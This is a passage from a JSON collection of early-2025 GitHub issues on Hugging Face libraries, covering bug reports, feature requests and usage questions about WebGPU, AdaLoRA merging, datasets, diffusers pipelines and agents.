"comments": 0, "user": "csaybar" }, { "repo": "huggingface/transformers.js", "number": 1142, "title": "Make in-browser WebGPU as seamless as in WebLLM", "body": "### Question\n\nHi there! \ud83d\udc4b\r\n\r\nI've noticed something interesting about WebGPU support in browsers:\r\n\r\n\u2705 [WebLLM's demo](https://chat.webllm.ai/) detects and uses my GPU automatically\r\n\u274c [transformers.js examples](https://huggingface.co/spaces/Xenova/nanollava-1.5-webgpu) fail with:\r\n```Error: no available backend found. ERR: [webgpu] TypeError: e.requestAdapterInfo is not a function```\r\n\r\nThis ease-of-use difference matters a lot for adoption. I believe reducing friction in GPU setup is crucial for adoption of in-browser ML models - when users need to modify browser settings or follow additional configuration steps, it can significantly impact their willingness to try new applications. WebLLM shows that seamless GPU detection is possible for in-browser ML models.\r\n\r\nEnvironment:\r\n- Chrome 131.0.6778.205\r\n- macOS\r\n\r\nCould transformers.js adopt a similar approach to WebLLM for automatic GPU detection? 
Happy to provide more details if needed!\r\n\r\nBest regards", "url": "https://github.com/huggingface/transformers.js/issues/1142", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-12T15:06:17Z", "updated_at": "2025-01-27T11:45:03Z", "user": "Anna-iroro" }, { "repo": "huggingface/peft", "number": 2322, "title": "model merge and unload feature for AdaLora", "body": "### Feature request\n\nunlike Lora or IA3 adapter type, AdaLora does not provide a method to merge lora adapter weights into original weights so that it can be used as a standalone model. I made that feature for a personal usecase and want to make a PR to make this feature accessible to everyone. \n\n### Motivation\n\nThis feature makes people easily merge AdaLora adapter weights into original weights, which makes further finetuning on it possible (i.e. when one wants to resume adalora training for checkpoints that was already trained with adalora, resuming training is not possible with unmerged weights. )\n\n### Your contribution\n\nI'll submit a PR. I followed the example of IA3 `merge_and_unload`\r\n\r\nFollowing is the overview of change : \r\n\r\n```\r\n def _unload_and_optionally_merge(\r\n self,\r\n merge: bool = True,\r\n safe_merge: bool = False,\r\n adapter_names: Optional[list[str]] = None,\r\n eps: float = 1e-5\r\n ) -> torch.nn.Module:\r\n \"\"\"\r\n This method unloads the AdaLoRA adapter modules and optionally merges them into the base model weights.\r\n \r\n Args:\r\n merge (`bool`, defaults to `True`):\r\n If True, merges the adapter weights into base model weights. \r\n If False, it will only unload the adapters without merging.\r\n safe_merge (`bool`, defaults to `False`):\r\n If True, performs the merge operation with extra safety checks.\r\n adapter_names (`List[str]`, *optional*):\r\n The list of adapter names to merge. If None, all active adapters will be merged.\r\n eps (`float`, defaults to 1e-5):\r\n Small constant for numerical stability when dividing by ranknum.\r\n \r\n Returns:\r\n model (`torch.nn.Module`):\r\n The resulting PyTorch model.\r\n \"\"\"\r\n if getattr(self.model, \"is_loaded_in_8bit\", False):\r\n raise ValueError(\"Cannot merge adalora layers when the model is loaded in 8-bit mode\")\r\n\r\n if getattr(self.model, \"is_loaded_in_4bit\", False):\r\n raise ValueError(\"Cannot merge adalora layers when the model is loaded in 4-bit mode\")\r\n \r\n if adapter_names is not None:\r\n raise ValueError(\"AdaLoRA does not support merging specific adapters. 
Got adapter_names={adapter_names}\")\r\n\r\n # Create a copy of the base model state dict to modify\r\n original_state_dict = self.model.state_dict()\r\n\r\n if merge:\r\n for name, module in self.model.named_modules():\r\n if hasattr(module, \"base_layer\") and hasattr(module, \"lora_A\"):\r\n # Extract base layer weight name\r\n layer_name = name.replace(\".lora_A\", \"\")\r\n layer_name = layer_name.replace(\"base_model.model.\", \"\")\r\n base_weight_name = f\"{layer_name}.weight\"\r\n\r\n # Get SVD parameters\r\n lora_A = module.lora_A[\"default\"] # [r x d_in]\r\n lora_B = module.lora_B[\"default\"] # [d_out x r]\r\n lora_E = module.lora_E[\"default\"] # [r x 1]\r\n \r\n # Calculate active ranks\r\n ranknum = (lora_E != 0).sum()\r\n scaling = module.scaling[\"default\"] if hasattr(module, \"scaling\") else 16\r\n\r\n # Safety check if requested\r\n if safe_merge and (torch.isnan(lora_A).any() or torch.isnan(lora_B).any() or torch.isnan(lora_E).any()):\r\n raise ValueError(f\"NaN detected in adapter weights for layer {name}\")\r\n\r\n # Scale A with E: A' = AE\r\n scaled_A = lora_A * lora_E # [r x d_in]\r\n\r\n # Compute update: \u0394W = BA'\r\n if ranknum > 0:\r\n update = (lora_B @ scaled_A) * scaling / (ranknum + eps)\r\n else:\r\n update = torch.zeros_like(original_state_dict[base_weight_name])\r\n\r\n # Update base weights\r\n if base_weight_name in original_state_dict:\r\n original_state_dict[base_weight_name] += update\r\n\r\n # Load the merged state dict back into a clean version of the model\r\n self.model.load_state_dict(original_state_dict)\r\n\r\n return self.model\r\n\r\n def merge_and_unload(\r\n self, \r\n safe_merge: bool = False, \r\n adapter_names: Optional[list[str]] = None,\r\n eps: float = 1e-5\r\n ) -> torch.nn.Module:\r\n \"\"\"\r\n Merge the active adapters into the base model and unload the adapters.\r\n \r\n Args:\r\n safe_merge (`bool`, defaults to `False`):\r\n If True, performs the merge operation with extra safety checks.\r\n adapter_names (`List[str]`, *optional*):\r\n List of adapter names to merge. If None, merges all active adapters.\r\n eps (`floa", "url": "https://github.com/huggingface/peft/issues/2322", "state": "closed", "labels": [], "created_at": "2025-01-12T09:20:01Z", "updated_at": "2025-01-14T12:47:35Z", "comments": 6, "user": "DaehanKim" }, { "repo": "huggingface/sentence-transformers", "number": 3166, "title": "How to report a security issue responsibly?", "body": "I have just found a potential security issue in the repo and want to know how I can report it to your team privately, thanks!", "url": "https://github.com/huggingface/sentence-transformers/issues/3166", "state": "closed", "labels": [], "created_at": "2025-01-12T04:24:15Z", "updated_at": "2025-01-12T08:52:43Z", "user": "zpbrent" }, { "repo": "huggingface/datasets", "number": 7365, "title": "A parameter is specified but not used in datasets.arrow_dataset.Dataset.from_pandas()", "body": "### Describe the bug\n\nI am interested in creating train, test and eval splits from a pandas Dataframe, therefore I was looking at the possibilities I can follow. I noticed the split parameter and was hopeful to use it in order to generate the 3 at once, however, while trying to understand the code, i noticed that it has no added value (correct me if I am wrong or misunderstood the code). 
\r\n\r\n\r\nfrom_pandas function code :\r\n\r\n```python\r\n if info is not None and features is not None and info.features != features:\r\n raise ValueError(\r\n f\"Features specified in `features` and `info.features` can't be different:\\n{features}\\n{info.features}\"\r\n )\r\n features = features if features is not None else info.features if info is not None else None\r\n if info is None:\r\n info = DatasetInfo()\r\n info.features = features\r\n table = InMemoryTable.from_pandas(\r\n df=df,\r\n preserve_index=preserve_index,\r\n )\r\n if features is not None:\r\n # more expensive cast than InMemoryTable.from_pandas(..., schema=features.arrow_schema)\r\n # needed to support the str to Audio conversion for instance\r\n table = table.cast(features.arrow_schema)\r\n return cls(table, info=info, split=split)\r\n```\n\n### Steps to reproduce the bug\n\n```python\r\nfrom datasets import Dataset\r\n# Filling the split parameter with whatever causes no harm at all\r\ndata = Dataset.from_pandas(self.raw_data, split='egiojegoierjgoiejgrefiergiuorenvuirgurthgi')\r\n```\n\n### Expected behavior\n\nWould be great if there is no split parameter (if it isn't working), or to add a concrete example of how it can be used.\n\n### Environment info\n\n- `datasets` version: 3.2.0\r\n- Platform: Linux-5.15.0-127-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- `huggingface_hub` version: 0.27.1\r\n- PyArrow version: 18.1.0\r\n- Pandas version: 2.2.3\r\n- `fsspec` version: 2024.9.0", "url": "https://github.com/huggingface/datasets/issues/7365", "state": "open", "labels": [], "created_at": "2025-01-10T13:39:33Z", "updated_at": "2025-01-10T13:39:33Z", "comments": 0, "user": "NourOM02" }, { "repo": "huggingface/peft", "number": 2319, "title": "Import error , is it a version issue?", "body": "### System Info\n\nWhen I execute the finetune.py file, an error occurs as follows: cannot import name 'prepare_model_for_int8_training'.Is it a version issue? 
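On the import error reported just above (huggingface/peft#2319): to the best of my knowledge, `prepare_model_for_int8_training` was deprecated and then removed from recent peft releases, which would explain the failure on 0.14.0; `prepare_model_for_kbit_training` is the replacement. A minimal sketch of the swap (the gpt2 checkpoint is only a stand-in):

```python
from transformers import AutoModelForCausalLM
# old import, removed in recent peft releases:
#   from peft import prepare_model_for_int8_training
from peft import prepare_model_for_kbit_training

model = AutoModelForCausalLM.from_pretrained("gpt2")  # stand-in model
# drop-in replacement; also covers 4-bit quantized models
model = prepare_model_for_kbit_training(model)
```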
My version is 0.14.0.\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\ncannot import name 'prepare_model_for_int8_training' from 'peft' (/path/python3.10/site-packages/peft/__init__.py)\n\n### Expected behavior\n\nWho can help me answer this question? Thanks!", "url": "https://github.com/huggingface/peft/issues/2319", "state": "closed", "labels": [], "created_at": "2025-01-10T02:34:52Z", "updated_at": "2025-01-13T10:13:18Z", "comments": 3, "user": "zhangyangniubi" }, { "repo": "huggingface/Google-Cloud-Containers", "number": 138, "title": "entrypoint.sh for TGI does not implement the requirements.txt installation process", "body": "Hello team,\r\n\r\nLike this sample, https://github.com/huggingface/Google-Cloud-Containers/blob/main/containers/pytorch/inference/gpu/2.3.1/transformers/4.46.1/py311/entrypoint.sh\r\n\r\nThe entrypoint needs a requirements.txt provisioning process.\r\n\r\nBut this TGI sample does not contain that procedure:\r\nhttps://github.com/huggingface/Google-Cloud-Containers/blob/main/containers/tgi/gpu/3.0.1/entrypoint.sh\r\n\r\nIs it missing, or is it handled internally by the text_generation_launcher process?", "url": "https://github.com/huggingface/Google-Cloud-Containers/issues/138", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-09T08:09:14Z", "updated_at": "2025-01-21T07:44:52Z", "user": "jk1333" }, { "repo": "huggingface/lerobot", "number": 623, "title": "Why different dimensionality state tensor with n_obs_steps vs not?", "body": "Curious about a design decision - why not have ACT take a [batch, n_obs_steps, state_dim] tensor and assert that n_obs_steps is 1, instead of [batch, state_dim]?\r\n\r\nCurrently, we have to detect the different dimensionalities and handle them when we're writing policy-agnostic code.", "url": "https://github.com/huggingface/lerobot/issues/623", "state": "closed", "labels": [ "question", "policies", "stale" ], "created_at": "2025-01-08T18:16:51Z", "updated_at": "2025-10-19T02:32:27Z", "user": "genemerewether" }, { "repo": "huggingface/diffusers", "number": 10496, "title": "NF4 quantized flux models with loras", "body": "Is there any update here? With NF4 quantized Flux models, I could not use any LoRA.\r\n\r\n> **Update**: NF4 serialization and loading are working fine. @DN6 let's brainstorm how we can support it more easily? This would help us unlock doing LoRAs on the quantized weights, too (cc: @BenjaminBossan for PEFT). I think this will become evidently critical for larger models. \r\n> \r\n> `transformers` has a nice reference for us to follow. 
Additionally, `accelerate` has: https://huggingface.co/docs/accelerate/en/usage_guides/quantization, but it doesn't support NF4 serialization yet.\r\n> \r\n> Cc: @SunMarc for jamming on this together.\r\n> \r\n> _Originally posted by @sayakpaul in https://github.com/huggingface/diffusers/issues/9165#issuecomment-2287694518_\r\n> ", "url": "https://github.com/huggingface/diffusers/issues/10496", "state": "closed", "labels": [], "created_at": "2025-01-08T11:41:01Z", "updated_at": "2025-01-13T19:42:03Z", "comments": 12, "user": "hamzaakyildiz" }, { "repo": "huggingface/diffusers", "number": 10489, "title": "Bug in SanaPipeline example?", "body": "### Describe the bug\r\n\r\nI think there might be something wrong with the `SanaPipeline` example code at https://huggingface.co/docs/diffusers/main/en/api/pipelines/sana#diffusers.SanaPipeline\r\nIt results in a shape mismatch (see detailed logs below): `mat1 and mat2 shapes cannot be multiplied (600x256000 and 2304x1152)`\r\n \r\nI've noticed that the `text_encoder` model looks different depending on the way it is loaded. \r\n* If I **load it with the official example code** (=code in `Reproduction`), `pipeline.text_encoder` looks like this:\r\n```\r\nGemma2ForCausalLM(\r\n (model): Gemma2Model(\r\n (embed_tokens): Embedding(256000, 2304, padding_idx=0)\r\n (layers): ModuleList(\r\n (0-25): 26 x Gemma2DecoderLayer(\r\n (self_attn): Gemma2Attention(\r\n (q_proj): Linear(in_features=2304, out_features=2048, bias=False)\r\n (k_proj): Linear(in_features=2304, out_features=1024, bias=False)\r\n (v_proj): Linear(in_features=2304, out_features=1024, bias=False)\r\n (o_proj): Linear(in_features=2048, out_features=2304, bias=False)\r\n (rotary_emb): Gemma2RotaryEmbedding()\r\n )\r\n (mlp): Gemma2MLP(\r\n (gate_proj): Linear(in_features=2304, out_features=9216, bias=False)\r\n (up_proj): Linear(in_features=2304, out_features=9216, bias=False)\r\n (down_proj): Linear(in_features=9216, out_features=2304, bias=False)\r\n (act_fn): PytorchGELUTanh()\r\n )\r\n (input_layernorm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n (pre_feedforward_layernorm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n (post_feedforward_layernorm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n (post_attention_layernorm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n )\r\n )\r\n (norm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n )\r\n (lm_head): Linear(in_features=2304, out_features=256000, bias=False)\r\n)\r\n```\r\n\r\nIf however I **don't load the components separately** but with the code provided by @lawrence-cj [here](https://github.com/huggingface/diffusers/issues/10334#issuecomment-2558359268) it 1) works and 2) the `text_encoder` looks different:\r\n\r\n```\r\nGemma2Model(\r\n (embed_tokens): Embedding(256000, 2304, padding_idx=0)\r\n (layers): ModuleList(\r\n (0-25): 26 x Gemma2DecoderLayer(\r\n (self_attn): Gemma2Attention(\r\n (q_proj): Linear(in_features=2304, out_features=2048, bias=False)\r\n (k_proj): Linear(in_features=2304, out_features=1024, bias=False)\r\n (v_proj): Linear(in_features=2304, out_features=1024, bias=False)\r\n (o_proj): Linear(in_features=2048, out_features=2304, bias=False)\r\n (rotary_emb): Gemma2RotaryEmbedding()\r\n )\r\n (mlp): Gemma2MLP(\r\n (gate_proj): Linear(in_features=2304, out_features=9216, bias=False)\r\n (up_proj): Linear(in_features=2304, out_features=9216, bias=False)\r\n (down_proj): Linear(in_features=9216, out_features=2304, bias=False)\r\n (act_fn): PytorchGELUTanh()\r\n )\r\n (input_layernorm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n (pre_feedforward_layernorm): 
Gemma2RMSNorm((2304,), eps=1e-06)\r\n (post_feedforward_layernorm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n (post_attention_layernorm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n )\r\n )\r\n (norm): Gemma2RMSNorm((2304,), eps=1e-06)\r\n)\r\n```\r\n-> the language modeling head `lm_head` is gone. Is guess that's all expected (?) but I haven't found any documentation of this behaviour or where in the pipeline code this happens. \r\n\r\n### Reproduction\r\n\r\n```python\r\nimport torch\r\nfrom diffusers import BitsAndBytesConfig as DiffusersBitsAndBytesConfig, SanaTransformer2DModel, SanaPipeline\r\nfrom transformers import BitsAndBytesConfig as BitsAndBytesConfig, AutoModelForCausalLM\r\n\r\nquant_config = BitsAndBytesConfig(load_in_8bit=True)\r\ntext_encoder_8bit = AutoModelForCausalLM.from_pretrained(\r\n \"Efficient-Large-Model/Sana_600M_1024px_diffusers\",\r\n subfolder=\"text_encoder\",\r\n # quantization_config=quant_config,\r\n torch_dtype=torch.float16,\r\n)\r\n\r\nquant_config = DiffusersBitsAndBytesConfig(load_in_8bit=True)\r\ntransformer_8bit = SanaTransformer2DModel.from_pretrained(\r\n \"Efficient-Large-Model/Sana_600M_1024px_diffusers\",\r\n subfolder=\"transformer\",\r\n # quantization_config=quant_config,\r\n torch_dtype=torch.float16,\r\n)\r\n\r\npipeline = SanaPipeline.from_pretrained(\r\n \"Efficient-Large-Model/Sana_600M_1024px_diffusers\",\r\n text_encoder=text_encoder_8bit,\r\n transformer=transformer_8bit,\r\n torch_dtype=torch.float16,\r\n device_map=\"balanced\",\r\n)\r\n\r\nprompt = \"a tiny astronaut hatching from an egg on the moon\"\r\nimage = pipeline(prompt).images[0]\r\nimage.save(\"sana.png\")\r\n```\r\n\r\nLoading without `quantization_config` because for some reason this does not work on my mac but I tried the same code on a 4090 and it fails there too.\r\n\r\n### Logs\r\n\r\n```shell\r\n---------------------------------------------------------------------------\r\nRuntimeError Traceback (most recent call last)\r\nCell In[5], line 30\r\n ", "url": "https://github.com/huggingface/diffusers/issues/10489", "state": "closed", "labels": [ "bug" ], "created_at": "2025-01-07T17:14:27Z", "updated_at": "2025-01-08T05:18:05Z", "comments": 2, "user": "geronimi73" }, { "repo": "huggingface/distil-whisper", "number": 164, "title": "How to finetune distil-whisper/distil-large-v2 model?", "body": "How to finetune distil-whisper/distil-large-v2 model?", "url": "https://github.com/huggingface/distil-whisper/issues/164", "state": "open", "labels": [], "created_at": "2025-01-07T12:59:42Z", "updated_at": "2025-01-07T13:00:59Z", "user": "dhattareddy" }, { "repo": "huggingface/doc-builder", "number": 539, "title": "How to Deploy huggingface/doc-builder Artifacts to GitHub Pages?", "body": "Hi,\r\n\r\nI am currently working with the `huggingface/doc-builder` and I'm looking to deploy the generated documentation artifacts to GitHub Pages. Could you provide guidance or best practices on how to achieve this?\r\n\r\nSpecifically, I am interested in understanding:\r\n\r\n1. The steps required to configure the deployment process.\r\n2. Any necessary settings or configurations within GitHub Pages.\r\n3. 
Common pitfalls or issues to be aware of during deployment.\r\n\r\nThank you for your assistance!", "url": "https://github.com/huggingface/doc-builder/issues/539", "state": "open", "labels": [], "created_at": "2025-01-07T08:37:05Z", "updated_at": "2025-01-07T08:37:05Z", "user": "shunk031" }, { "repo": "huggingface/peft", "number": 2310, "title": "Comparison of Different Fine-Tuning Techniques for Conversational AI", "body": "### Feature request\n\nIt would be incredibly helpful to have a clear comparison or support for various fine-tuning techniques specifically for conversational AI. This feature could include insights into their strengths, limitations, and ideal use cases, helping practitioners choose the right approach for their needs.\r\n\r\nHere\u2019s a list of techniques to consider:\r\n\r\nLoRa\r\nAdaLoRa\r\nBONE\r\nVeRa\r\nXLora\r\nLN Tuning\r\nVbLora\r\nHRA (Hyperparameter Regularization Adapter)\r\nIA3 (Input-Aware Adapter)\r\nLlama Adapter\r\nCPT (Conditional Prompt Tuning)etc\n\n### Motivation\n\nWith the growing number of fine-tuning techniques for conversational AI, it can be challenging to identify the most suitable approach for specific use cases. A comprehensive comparison of these techniques\u2014highlighting their strengths, limitations, and ideal scenarios\u2014would save time, reduce trial-and-error, and empower users to make informed decisions. This feature would bridge the gap between research and practical application, enabling more effective model customization and deployment.\n\n### Your contribution\n\nI\u2019d be happy to collaborate on this! While I might not have a complete solution right now, I\u2019m willing to contribute by gathering resources, reviewing papers, or helping organize comparisons. If others are interested in teaming up, we could work together on a PR to make this feature happen. Let\u2019s connect and brainstorm how we can tackle this effectively! ", "url": "https://github.com/huggingface/peft/issues/2310", "state": "open", "labels": [ "good first issue", "help wanted", "contributions-welcome" ], "created_at": "2025-01-07T07:07:50Z", "updated_at": "2025-12-15T09:58:10Z", "comments": 44, "user": "ImamaDev" }, { "repo": "huggingface/smolagents", "number": 83, "title": "How to save/extract executed code", "body": "Is it possible to save the executed code? It's already in the log. 
It will be very useful.\r\nex.\r\n```\r\n\u256d\u2500 Executing this code: \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256e\r\n\u2502 1 attractions_list = [ \u2502\r\n\u2502 2 [\"Attraction\", \"Description\"], \u2502\r\n\u2502 3 [\"Sensoji Temple\", \"The oldest temple in Tokyo, offering beautiful architecture and a rich history.\"], \u2502\r\n\u2502 4 [\"Nakamise Shopping Street\", \"A historic shopping street with souvenirs and traditional snacks.\"], \u2502\r\n\u2502 5 [\"Kibi Dango\", \"A traditional rice cake snack available at Nakamise Street.\"], \u2502\r\n\u2502 6 [\"Asakusa Jinja\", \"A historic Shinto shrine that survived the bombings during WWII.\"], \u2502\r\n\u2502 7 [\"Kimono Experience\", \"Rent a kimono and walk around Asakusa.\"], \u2502\r\n\u2502 8 [\"Asakusa Culture Tourist Information Center\", \"A building with unique architecture, great for photos.\"], \u2502\r\n\u2502 9 [\"Tokyo Skytree\", \"The tallest structure in Tokyo, offering panoramic views.\"], \u2502\r\n\u2502 10 [\"Hanayashiki\", \"Japan\u2019s oldest amusement park with nostalgic charm.\"], \u2502\r\n\u2502 11 [\"Demboin Garden\", \"A serene Japanese garden adjacent to Sensoji Temple.\"], \u2502\r\n\u2502 12 [\"Azuma-bashi Bridge\", \"An iconic bridge offering views of the Tokyo Skytree.\"] \u2502\r\n\u2502 13 ] \u2502\r\n\u2502 14 \u2502\r\n\u2502 15 # Convert the list to CSV format (string) \u2502\r\n\u2502 16 csv_data = \"\\n\".join([\",\".join(row) for row in attractions_list]) \u2502\r\n\u2502 17 \u2502\r\n\u2502 18 # Save the CSV data to file \u2502\r\n\u2502 19 save_csv(data=csv_data, filename='asakusa_trip.csv') \u2502\r\n\u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f", "url": "https://github.com/huggingface/smolagents/issues/83", "state": "closed", "labels": [], "created_at": "2025-01-06T15:40:17Z", "updated_at": "2025-02-16T17:43:40Z", "user": "Lodimup" }, { "repo": "huggingface/diffusers", "number": 10475, "title": "[SD3]The quality of the images generated by the inference is not as high as on the validation set during fine-tuning?", 
"body": "### Describe the bug\n\nWhy is the quality of the graphs I generate with `StableDiffusion3Pipeline` not as good as the quality of the images in the validation set in the log generated when using dreambooth_lora for fine tuning?\r\nMaybe I need some other plugin or parameter setting to maintain the same image quality as the validation set?\n\n### Reproduction\n\n```\r\n# Here is my inference code:\r\n\r\nimport torch\r\nfrom diffusers import StableDiffusion3Pipeline\r\n\r\npipe = StableDiffusion3Pipeline.from_pretrained('./diffusers/stabilityai/stable-diffusion-3-medium-diffusers', torch_dtype=torch.float16).to('cuda')\r\npipe.load_lora_weights(\"./my_path/pytorch_lora_weights.safetensors\", adapter_name=\"test_lora\")\r\nimg = pipe(\r\n \"my prompt...\",\r\n generator=torch.manual_seed(1),\r\n num_inference_steps=40,\r\n guidance_scale=6\r\n).images[0].save('/root/my_img.png')\r\n```\n\n### Logs\n\n_No response_\n\n### System Info\n\nDiffuser Version: stable-diffusion-3-medium\r\nCUDA Version: 12.4\r\nGPU: NVIDIA A800 80GB\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/10475", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2025-01-06T14:52:57Z", "updated_at": "2025-02-06T12:17:47Z", "comments": 8, "user": "ytwo-hub" }, { "repo": "huggingface/datasets", "number": 7356, "title": "How about adding a feature to pass the key when performing map on DatasetDict?", "body": "### Feature request\n\nAdd a feature to pass the key of the DatasetDict when performing map\n\n### Motivation\n\nI often preprocess using map on DatasetDict. \r\nSometimes, I need to preprocess train and valid data differently depending on the task. \r\nSo, I thought it would be nice to pass the key (like train, valid) when performing map on DatasetDict. \r\n\r\nWhat do you think?\n\n### Your contribution\n\nI can submit a pull request to add the feature to pass the key of the DatasetDict when performing map.", "url": "https://github.com/huggingface/datasets/issues/7356", "state": "closed", "labels": [ "enhancement" ], "created_at": "2025-01-06T08:13:52Z", "updated_at": "2025-03-24T10:57:47Z", "user": "jp1924" }, { "repo": "huggingface/diffusers", "number": 10468, "title": "What is accelerate_ds2.yaml\uff1f", "body": "I can't find accelerate config file named \"accelerate_ds2.yaml\". \r\nPlease give me the file.\r\nThanks very much!", "url": "https://github.com/huggingface/diffusers/issues/10468", "state": "closed", "labels": [], "created_at": "2025-01-06T07:53:06Z", "updated_at": "2025-01-12T05:32:01Z", "user": "aa327chenge" }, { "repo": "huggingface/transformers", "number": 35523, "title": "How about adding a combined step and epoch feature to save_strategy?", "body": "### Feature request\n\nAdd epoch+steps functionality to save_strategy\n\n### Motivation\n\nI often set save_strategy to epoch for saving, but sometimes I need to run experiments with steps. \r\nRecently, I had to compare checkpoints saved at both epoch and step intervals, which required running the experiment twice and was quite cumbersome. Having a combined feature would be really helpful. 
What do you think?\n\n### Your contribution\n\nI can add the epoch+steps functionality to save_strategy.", "url": "https://github.com/huggingface/transformers/issues/35523", "state": "closed", "labels": [ "Feature request" ], "created_at": "2025-01-06T02:21:22Z", "updated_at": "2025-02-17T00:02:42Z", "user": "jp1924" }, { "repo": "huggingface/transformers", "number": 35512, "title": "Perhaps your features (`videos` in this case) have excessive nesting (inputs type `list` where type `int` is expected).", "body": "### System Info\n\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\n\n- `transformers` version: 4.46.1\n- Platform: Linux-5.15.0-125-generic-x86_64-with-glibc2.35\n- Python version: 3.10.16\n- Huggingface_hub version: 0.27.0\n- Safetensors version: 0.4.5\n- Accelerate version: 1.0.1\n- Accelerate config: not found\n- PyTorch version (GPU?): 2.5.1+cu124 (True)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script?: \n- GPU type: NVIDIA GeForce RTX 4090\n\n### Who can help?\n\n@ArthurZucker \n\nclass BatchEncoding(UserDict):\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n```python\n [INST] What are the names of some famous actors that started their careers on Broadway? [/INST] Some famous actors that started their careers on Broad[78/1906]\nde: \n1. Hugh Jackman \n2. Meryl Streep \n3. Denzel Washington \n4. Julia Roberts \n5. Christopher Walken \n6. Anthony Rapp \n7. Audra McDonald \n8. Nathan Lane \n9. Sarah Jessica Parker \n10. Lin-Manuel Miranda \nlabel_ids: \n[-100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, 2909, 8376, 16760, 369, \n2774, 652, 26072, 356, 24331, 3024, 28747, 28705, 13, 28740, 28723, 22389, 4299, 1294, 28705, 13, 28750, 28723, 351, 1193, 28714, 4589, 615, 28705, 13, 28770, 2872\n3, 4745, 10311, 5924, 28705, 13, 28781, 28723, 19526, 18021, 28705, 13, 28782, 28723, 17561, 9863, 269, 28705, 13, 28784, 28723, 15089, 399, 763, 28705, 13, 28787,\n 28723, 14421, 520, 25999, 28705, 13, 28783, 28723, 20514, 19029, 28705, 13, 28774, 28723, 12642, 24062, 19673, 28705, 13, 28740, 28734, 28723, 6678, 28733, 2356, \n3009, 9154, 5904, 2] \nlabels: \nSome famous actors that started their careers on Broadway include: \n1. Hugh Jackman \n2. Meryl Streep \n3. Denzel Washington \n4. Julia Roberts \n5. Christopher Walken ", "url": "https://github.com/huggingface/transformers/issues/35512", "state": "closed", "labels": [ "bug" ], "created_at": "2025-01-05T06:51:26Z", "updated_at": "2025-02-13T08:45:39Z", "user": "yxy-kunling" }, { "repo": "huggingface/diffusers", "number": 10452, "title": "pipe.disable_model_cpu_offload", "body": "**Is your feature request related to a problem? Please describe.**\r\n\r\nIf I enable the following in Gradio interface\r\nsana_pipe.enable_model_cpu_offload()\r\n\r\nand during next generation I want to disable cpu offload, how to do it? 
